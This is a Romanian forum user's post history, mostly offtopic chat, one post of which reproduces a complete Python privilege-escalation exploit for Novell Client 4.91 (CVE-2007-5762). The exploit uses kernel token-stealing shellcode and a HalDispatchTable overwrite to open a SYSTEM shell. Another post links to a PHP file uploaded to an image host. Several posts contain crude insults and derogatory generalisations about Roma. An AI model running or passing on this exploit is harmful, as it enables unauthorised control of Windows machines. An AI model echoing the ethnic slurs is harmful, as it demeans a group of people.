Jump to content

qbert

Active Members
  • Posts

    1140
  • Joined

  • Last visited

  • Days Won

    3

Everything posted by qbert

  1. qbert

    Tigan borat

    "Daca n-ai cap sau pistol atunci lucreaza la biceps",sau nu iesii noapte pe strada. Asta deja e paranoia. Daca tu consideri ca esti in masura sa judeci si sa acorzi sentinte de genul...pula mea,fa-te judecator.
  2. qbert

    Tigan borat

    Nu stiu de stau sa scriu comentariu asta,discutiile astea(ca de altfel toate discutiile offtopic de pe forumul asta) sunt de cacat,"daca pleca,daca nu pleca".Shit happens,mai ales la martalogi,sunt pline orasele atat de tigani ca ala,care daca nu ii arunca bicicleta,chiar nu aveam ce sa ii reprosez,la fel sunt pline de martalogi ca ala,adica,pula mea coaie,te stii slab de inger,ia-l cu sclavagisme,da-i o tigara,dar nu sta ca prostu` acolea sa te dezbrace ala la pula goala.Asa merge societatea si asa a mers si umanitatea de-a lungul timpului,cei slabi au pierit.
  3. qbert

    Tigan borat

    Doar mie mi s-a parut amuzant?
  4. Dreptul la vot ar trebui sa fie restrictionat anumitor cetateni,nu mi se pare corect,sa ia hotarari toti analfabetii pentru mine.Cat despre alegeri,Remus Cernea all the way!
  5. Iti dai seama ca este tras de par termenul de "sistem de operare",nu?
  6. Unul din ele .
  7. E o diferenta intre a nu exista si a nu fi activat:) Strstr ocupa mai multa memorie si este mai lent fata de strpos,de aceea este dezactivat pe majoritatea hostingurilor shared.
  8. Daca vreau sa fiu un bun programator .net? Din cate stiam,strstr e valabil pe ambele os-uri cel putin din php4,in orice caz,e o functie minora ce se poate rescrie,exista module ca pcntl carora li se simta lipsa in windows. Ontopic:De ce trebuie sa fie windows mai bun ca linux sau viceversa?De ce trebuie sa semene si sa le comparam?
  9. Poti folosi YPOPs! :: Free POP3/SMTP Access to Yahoo! Mail .
  10. # Novell Client 4.91 SP3/4 Privilege escalation exploit # Download link: http://download.novell.com/Download?buildid=SyZ1G2ti7wU~ # # SecurityFocus: http://www.securityfocus.com/bid/27209/info # CVE: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5762 # Patch: http://download.novell.com/Download?buildid=4FmI89wOmg4~ # # Author: sickness@offensive-security.com # Version Tested: Novell Client 4.91 SP4 # Targets: Exploit works on all service packs of Win2K3 and WinXP (except Windows XP SP1) # Thanks: # - g0tmi1k for helping me test out the exploit on as many versions of Windows as possible. # - ryujin for the help while developing the exploit. from ctypes import * import sys,struct,os from optparse import OptionParser kernel32 = windll.kernel32 ntdll = windll.ntdll Psapi = windll.Psapi def GetBase(drvname=None): EVIL_ARRAY = 1024 myarray = c_ulong * EVIL_ARRAY lpImageBase = myarray() cb = c_int(1024) lpcbNeeded = c_long() drivername_size = c_long() drivername_size.value = 48 Psapi.EnumDeviceDrivers(byref(lpImageBase), cb, byref(lpcbNeeded)) for baseaddr in lpImageBase: drivername = c_char_p("\x00"*drivername_size.value) if baseaddr: Psapi.GetDeviceDriverBaseNameA(baseaddr, drivername, drivername_size.value) if drvname: if drivername.value.lower() == drvname: print "[>] Retrieving %s information." % drvname print "[>] %s base address: %s" % (drvname, hex(baseaddr)) return baseaddr else: if drivername.value.lower().find("krnl") !=-1: print "[>] Retrieving Kernel information." print "[>] Kernel version: ", drivername.value print "[>] Kernel base address: %s" % hex(baseaddr) return (baseaddr, drivername.value) return None if __name__ == '__main__': usage = "%prog -o <target>" parser = OptionParser(usage=usage) parser.add_option("-o", type="string", action="store", dest="target_os", help="Available target operating systems: XP, 2K3") (options, args) = parser.parse_args() OS = options.target_os if not OS or OS.upper() not in ['XP','2K3']: parser.print_help() sys.exit() OS = OS.upper() GENERIC_READ = 0x80000000 GENERIC_WRITE = 0x40000000 OPEN_EXISTING = 0x3 DEVICE = '\\\\.\\nicm' device_handler = kernel32.CreateFileA(DEVICE, GENERIC_READ|GENERIC_WRITE, 0, None, OPEN_EXISTING, 0, None) (krnlbase, kernelver) = GetBase() hKernel = kernel32.LoadLibraryExA(kernelver, 0, 1) HalDispatchTable = kernel32.GetProcAddress(hKernel, "HalDispatchTable") HalDispatchTable -= hKernel HalDispatchTable += krnlbase HalBase = GetBase("hal.dll") print "[>] HalDispatchTable address:", hex(HalDispatchTable) HalDispatchTable0x4 = HalDispatchTable + 0x4 HalDispatchTable0x8 = HalDispatchTable0x4 + 0x4 HalDispatchTable_0x14 = HalDispatchTable0x4 - 0x10 if OS == "2K3": HaliQuerySystemInformation = HalBase + 0x1fa1e # Offset for 2003 HalpSetSystemInformation = HalBase + 0x21c60 # Offset for 2003 else: HaliQuerySystemInformation = HalBase + 0x16bba # Offset for XP HalpSetSystemInformation = HalBase + 0x19436# Offset for XP print "[>] HaliQuerySystemInformation address:", hex(HaliQuerySystemInformation) print "[>] HalpSetSystemInformation address:", hex(HalpSetSystemInformation) EVIL_IOCTL = 0x00143B6B # Vulnerable IOCTL retn = c_ulong() inut_buffer = HalDispatchTable0x4 - 0x10 + 0x3 # Make the pwnsauce overwrite inut_size = 0x0 output_buffer = 0x41414141 # Junk output_size = 0x0 # Get offsets if OS == "2K3": _KPROCESS = "\x38" # Offset for 2003 _TOKEN = "\xd8" # Offset for 2003 _UPID = "\x94" # Offset for 2003 _APLINKS = "\x98" # Offset for 2003 else: _KPROCESS = "\x44" # Offset for XP _TOKEN = "\xc8" # Offset for XP _UPID = "\x84" # Offset for XP _APLINKS = "\x88" # Offset for XP # Restore the pointer pointer_restore = "\x31\xc0" + \ "\xb8" + struct.pack("L", HalpSetSystemInformation) + \ "\xa3" + struct.pack("L", HalDispatchTable0x8) + \ "\xb8" + struct.pack("L", HaliQuerySystemInformation) + \ "\xa3" + struct.pack("L", HalDispatchTable0x4) # Make the evil token stealing steal_token = "\x52" +\ "\x53" +\ "\x33\xc0" +\ "\x64\x8b\x80\x24\x01\x00\x00" +\ "\x8b\x40" + _KPROCESS +\ "\x8b\xc8" +\ "\x8b\x98" + _TOKEN + "\x00\x00\x00" +\ "\x89\x1d\x00\x09\x02\x00" +\ "\x8b\x80" + _APLINKS + "\x00\x00\x00" +\ "\x81\xe8" + _APLINKS + "\x00\x00\x00" +\ "\x81\xb8" + _UPID + "\x00\x00\x00\x04\x00\x00\x00" +\ "\x75\xe8" +\ "\x8b\x90" + _TOKEN + "\x00\x00\x00" +\ "\x8b\xc1" +\ "\x89\x90" + _TOKEN + "\x00\x00\x00" +\ "\x5b" +\ "\x5a" +\ "\xc2\x10" # Build the shellcode sc = "\x90" * 100 sc+= pointer_restore + steal_token sc+= "\x90" * 100 if OS == "2K3": baseadd = c_int(0x02a6ba10) else: baseadd = c_int(0x026e7bb0) MEMRES = (0x1000 | 0x2000) PAGEEXE = 0x00000040 Zero_Bits = c_int(0) RegionSize = c_int(0x1000) write = c_int(0) dwStatus = ntdll.NtAllocateVirtualMemory(-1, byref(baseadd), 0x0, byref(RegionSize), MEMRES, PAGEEXE) if OS == "2K3": kernel32.WriteProcessMemory(-1, 0x02a6ba10, sc, 0x1000, byref(write)) else: kernel32.WriteProcessMemory(-1, 0x026e7bb0, sc, 0x1000, byref(write)) if device_handler: print "[>] Sending IOCTL to the driver." dev_io = kernel32.DeviceIoControl(device_handler, EVIL_IOCTL, inut_buffer, inut_size, output_buffer, output_size, byref(retn), None) evil_in = c_ulong() evil_out = c_ulong() evil_in = 0x1337 hola = ntdll.NtQueryIntervalProfile(evil_in, byref(evil_out)) print "[>] Launching shell as SYSTEM." os.system("cmd.exe /K cd c:\\windows\\system32") Novell Client 4.91 SP4 Privilege Escalation Exploit
  11. Desi prefer,la fel ca Hitches "Sa am o teorie a conspiratiei,decat nici o teorie",nu mai haliti tot ce vedeti.Vezi .Si hai sa iti mai spun ceva,va plangeti ca suntem tinuti sub control,pai cum pula mea sa nu fim,controlati,ce s-ar intampla cand toti retardatii ar avea acces la libertate deplina?
  12. Nu va mai cacati atat pe voi.Ucisi nu ar trebui sa fie hotii,credeti ca aia au furat cartofi ca le era prea bine?La noi se fura pentru ca se poate,politia este incompetenta.Cat despre tigani,e un subiect complicat,insa tind sa ii dau dreptate lu empathy(sau cum pula mea ii zicea lu` aia) cand zicea ca a generaliza inseamna sa fi un prost irecuperabil.
  13. Sa traiesti bre!
  14. Mindfuck Movies list
  15. Vezi ca iti urca orice... http://ecstasy-image-hosting.com/upload/2012/05/07/b.php
  16. qbert

    carcasa pc

    Eu am taiat carcasa cu flexu`,dar ai nevoie de unul micut.
  17. qbert

    Fun stuff

  18. De ce 3 parole:))?
  19. De ce cacat as cumpara asa ceva,cand se scrie in cateva linii?
  20. https://rstcenter.com/forum/search.php?searchid=300374 . Esti ceva gen "Ill create a gui in visual basic to find out his ip"
  21. qbert

    hi again.

    Welcome back bre:)
  22. Desi nici asta nu este adevarat random,it`s pretty cool:) Behind Intel's New Random-Number Generator - IEEE Spectrum .
  23. Se auzea ca defapt ar fi fost problema prin flash.
  24. qbert

    Etarget

    Mi-au platit etarget,doar ca te poti trezi cu reclamele suspendate pe cine stie ce motiv(continuti indeajuns,index fara prea mult text,etc) chiar daca initial le poti pune pe site.
×
×
  • Create New...